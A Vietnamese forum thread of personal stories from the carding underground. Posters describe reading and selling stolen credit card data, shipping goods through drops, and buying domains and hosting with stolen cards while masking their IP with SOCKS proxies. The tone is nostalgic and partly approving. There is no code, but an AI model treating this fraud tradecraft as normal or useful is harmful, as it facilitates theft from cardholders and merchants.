Sau khi dùng domain cấp 2 và hosting free chán ,mình quyết định đầu tư ,để có con domain xịn ,thế là mình lang thang tìm hiểu này nọ ,thì gặp một anh,éo bik anh hay thằng nữa ,ở Đà Nẵng ,sau khi chat chit ,thì mình ngõ ý mua domain .com ,với giá là 150k /1 năm ,mình đồng ý,và anh ý sẽ gửi info về email của mình ,và anh í thật khoáng đạt ,đã demo cho mình một domain ,hix hix,sướng vô cùng ,anh í bảo là anh í gửi địa chỉ ra ngân hang gửi cho anh í,khoảng 2h chiều lên mạng để xác nhận ,mình thật thà ra chờ anh í để mình gửi tiên ,chờ mãi éo thấy online ,thế là giấc mơ có domain xịn của mịnh sup đổ ,
20.xhacker
Của chùa thì vẫn về chùa thôi
Mình mới vào UG chính xác được 1 năm 3 tháng
Hồi đầu là vào KVE đây là nơi mình tập đọc CC lần đầu tiên. Admin hồi đó là matrixhacking. Hồi đó sao mà ngưỡng mộ him thế, ngày ngày chờ him Post CC cho anh em ăn , hồi đó đúng là như con chó chờ chủ cho ăn. Sau này mới biết thực sự matrixhacking là thế nào ?
Từ KVE biết đến VHZ và 1 số 4rum UG khác.
Hồi đó vào UG chỉ với 1 mục đích là kiếm tiền vì nhìn ông anh học trên 3 khóa đang là sinh viên năm cuối , chơi UG mà mua được ô tô ( choáng và khâm phục quá )
Sau 3 thang lang bạt học hỏi bắt đầu Ship. Con hàng Ped đầu tiên là 1 cái Laptop trị giá $950 và rồi bị Drop Scam , thực ra là 1 thằng Ghana. Không nản chí lại tiếp tục tìm kiếm Drop mới . Vẫn thất bại vì không thể hợp tác làm ăn với bất cứ Drop nào và vì mới bị Scam nên tinh thần cảnh giác cao quá. Hồi đó chơi bời nợ nần kinh quá , máy tính bản thân cắm đứt luôn đành dùng máy người yêu tập tành UG.
Không lâu sau đó thì bắt đầu kiếm được tiền từ CC . Hồi đó còn dùng E-gold để mua bán CC là rất thịnh hành. Dần rà cũng biết đến 1 số Bro đinh cao UG nhưng thực sự mình lại không thích học hỏi từ người khác hay cầu xin họ Share TUT nọ kia nên không giao lưu nhiều lắm. Ẩn mình là tốt hơn trên thế giới UG. Sau hơn 1 năm vào UG được và mất như sau :
Được : hơn 200 trăm triệu , ( đã dùng để mua laptop, xe máy …. )
nhậu nhẹt nhiều hơn và hoành tráng hơn vì có tiền
người yêu nể hơn vì đã biết kiếm ra tiền
bố mẹ đỡ buồn hơn vì không còn phải xin tiền trả nợ
Mất : học ngu đi rất nhiều
người gầy đi vì thức đêm nhiều
nợ thêm gần 20 trình
một năm kiến thức đại học
Nói tóm lại : được được mất mất chỉ là phù du. Tiền kiếm được bao nhiêu tiêu hết bấy nhiêu chẳng để dành được xu nào.
Có 1 thời gian chán UG không muốn vào nữa nhưng rồi ma lực của đồng tiền vẫn lôi kéo
21.NST2mo
thấy các thí chủ hạ bút xã thơ , nst2mo tui đây cũng cố gắng 1 xíu coi như bằng anh bằng em
Nst2mo bước chân vào thế giới UG cách đây cũng 5 – 6 năm rồi , lúc trước chỉ biết chat , cứ lên mạng là chat chat chat cả ngài , lúc trước nst2mo có 1 thằng bạn nó cũng thích internet lắm nhưng chưa biết sử dụng thế nào, và rồi nó quyết định nhờ nst2mo hướng dẫn nó về mọi thứ ( tất nhiên … những thứ mà nst2mo biết mởi chỉ  )
1 năm không gặp nó, bớt chợt nst2mo lang thang đến 1 tiệm net gần trường , và gặp nó tại đó … nó đang ngồi… chào hỏi …. nst2mo nhìn vào màng hình máy tính của nó ….. ui trời toàn số má và chữ chi chít lăng nhăng  Thấy vậy nst2mo cũng hỏi nó xem đang làm cái qái gì mà toàn số và chữ zay, nó trả lời 1 cách hồn nhiên : WEB  …. WEB ????? ( nst2mo cũng biết về các trang web nhạc , phim , allbum photos … nhưng nghe nó nói làm WEB thấy hơi bị bất ngờ vì thằng nài nó còn phải học hỏi mình nhiều mà) …. Nhìn thấy số má nhiều quá đến nổi choáng cả mặt đành chào tạm biệt thằng bạn thân yêu đi uống cà phé.
Ngồi vào quán caffee, nst2mo sao cứ nghĩ đến những con số và những đoạn văn bản đó , thấy cũng thú vị và hấp dẫn, và rồi … đạp xe lại quán Net đó , lôi đầu thằng kia đến quán caffee hỏi nó tất tần tật về WEB wiet , nó bão làm web cần có domain và host  ( domain là cái qái gì , host là cái qái gì , nhỏ lớn nghe 2 cái từ nài bao giờ đâu ) nó thấy ngơ ngác như con nai tơ nó bắt đầu giải thích từng thứ 1 về WEB —> đã hiểu , nhưng hiểu ở đây chỉ là hiểu về mặt lý thuyết và còn lờ mờ …. và rồi từ đó … nst2mo bắt đầu 1 công cuộc CHINH PHỤC BỘ NÃO  của mình quyết tâm cho bằng bạn bằng bè.
Từ dạo biết được chút kinh nghiệm từ thằng bạn thân yêu , nst2mo đã nghiện….. internet  nghiện đến nỗi quên ăn sang – trưa , chơi quên cả thời gian , mưa nắng không cần biết đến …. cứ cắm đầu vào cái màng hình máy tính để thử tài làm web của mình ra sao ….. bước đầu cũng tập tành làm những site music , cũng sao chép từ các code ra và edit skin lại , nhưng ngặc 1 nỗi vẫn chưa có domain để chạy site ( chỉ toàn xài url dài loằn ngoằng ) và rồi cũng nhờ thằng bạn nó chỉ đến domain .NET.MS , .KISS.TO ,… Đã có domain + host free roài bắt đầu công cuộc ADS cho site của mình .
2 thằng bạn thân cùng làm 2 cái web 1 lúc và ads 1 lúc nhưng tại sao web của mình không được người khác đón nhận ( pages view chỉ có 50 – 80 người 1 ngày ) còn web nó lại được rất chi là đông người vào ( pages view lến đến 600 – 900 người 1 ngày ) … tại sao , vò đầu bức tóc đàng chịu và rồi cũng hỏi nó , nó bảo đấy là do DOMAIN ( lại là cái qái nài ) : ” Domain ta đã có rồi còn do Domain gì nữa ” , nó chữi mình ngu ( Sh!t cái thằng nài ) nó bão Domain của nó là Domain Quốc Tế , Domain tốn tiền ( .COM vì nó là admin của MUSICDANANG.COM mà ) còn Domain của nst2mo là domain Free và dài loằng ngoằng khó nhớ , và đây cũng là bước ngoặt thứ 2 để nst2mo bước vào thế giới UG ( tìm kiếm và học hỏi để có đươc thứ mình cần là DOMAIN QUỐC TẾ ) .
Lúc đầu khi chân ướt chân ráo bước vào UG, bở ngỡ và lạ lẫm trước những bài viết hướng dẫn về các đọc và kiểm tra ( check ) CC , đọc đi đọc lại vẫn còn lơ mơ như con gà mái tơ —> chịu đành nhờ thằng bạn hỗ trợ 1 cái để có cái gọi là TÊN MIỀN RIÊNG cho WEB của minh  , nó cũng giúp , nó nhờ 1 người tên là HOANGANHV… reg cho nst2mo 1 cái domain 2 năm tại 123reg.co.uk ( nuocmatthienthan.info ) , có domain roài , mừng mún khóc lun zầy đó  bắt đầu đi tiếp bước làm web , sau 2 – 3 tháng web hoạt động …. đùng 1 cái host die  bùn vật vã , đành nhờ thằng bạn cho xài ké 1 xíu host , nó kì kèo cái gì cũng nhờ , ức chế  , thôi ta đành tự mày mò zầy.
Tập tành đọc CC và check CC , cũng đã hiểu ra , lúc trước có người giới thiệu vào emgai.org , lúc đó lôi hết nhưng kinh nghiệm nst2mo đọc và hiểu ra để thực hành , vác cc share trong 4rum trên ra fang máy cái host cùi —> QUA  mừng túng ta túng tỉm , bắt tay vào làm web lại …. sau 10 ngày … host die  chẳng hiều vì sao , thằng bạn hỏi khi buy host có fake ip không , bảo ip là cái quái gì  , nó lại chữi NGU  , roài cũng tìm hiều SOCK IP PROXY là cái qái gì mà khi buy fai cần đến nó , và cuối cùng cũng hiểu nó là thứ quan trong không thể thiếu trong quá trình buy
Sau 1 thời gian vào UG, nst2mo cũng nắm trong tay 1 ” tài sản ” gọi là cũng khá ( 3 acc domain ở Joker mỗi acc 20 – 25 domain ) … nhưng sao cuộc đời ai đoán được chữ NGỜ , nst2mo chủ quan đặt pass 3 acc giống nhau , bị cài keylog vào máy lúc nào không biết —> bị hack, quyết tâm làm lại từ đầu.
Cho đến 1 ngày , lang thang trên internet gặp lão Quanchienptc , lão cũng biết về UG nhưng chơi ADS chủ yếu , lão hướng dẫn nst2mo về ads kiếm tiền … học hỏi … mò mẫm … thử đủ cách vẫn không thể nào học được , thôi đành quay lại nghề reg domain của mình, lúc đó reg nhiều ra cũng chỉ để ngắm nhìn thành quả của mình chứ chưa nghĩ đến chuyện reg ra để bán. Đến 1 ngày, mấy thằng bạn cũng lớp 8 với nhau nói về chuyện web hack võ lâm ( nghe đến web qiết là ghiền ) tụi nó bảo xài tên miền dài quá khó rao web để người khac vào , nst2mo cũng nghĩ thấy vậy đành bắt chuyện nói mình có thể bán tên miền quốc tế
Thế là nst2mo bắt đầu kiếm tiền từ cách reg domain để bán cho mấy đưa bạn , nhờ quen biết tụi nó giới thiệu rất nhiều người khác hỏi mua , cầm trong tay số tiền lần đâu tiên đối với 1 thằng học sinh gọi là quá lơn ( 200 – 400 ngàn ) thấy sướng quá
Tuy giờ đây không phải nói nhờ cách kiêm tiền trên mà nst2mo giàu nhưng cũng đủ để chi tiêu những việc cá nhân riêng cho mình
Cảm ơn thằng bạn thân đã mở cho nst2mo 1 con đường sống, cảm ơn mài Leo Njcky17 àh
Cảm ơn UG
Xem Lại >> Đời UG :::: Đam mê – Tiền Và Gái ::: [Part 1]